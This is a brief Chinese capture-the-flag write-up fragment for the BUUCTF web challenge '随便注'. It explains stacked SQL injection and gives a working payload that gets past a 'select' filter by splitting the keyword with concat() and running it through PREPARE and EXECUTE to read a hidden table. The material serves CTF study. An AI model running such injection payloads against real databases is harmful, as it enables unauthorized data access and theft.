第一种方法里面有比较简单的处理方式;
用1'; union select * from `1919810931114514`; ,但是由于限制了select,所以用concat拼接之后再预编译就可以了。
1';
sEt @sql = concat('se', 'lect * from `1919810931114514`;');
pRepare st from @sql;
execute st;#
BUUCTF-Web-随便注(三种解题思路)知识点:SQL注入-堆叠注入,sql预处理语句,巧用contact()函数绕过 堆叠注入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在分号(;)...
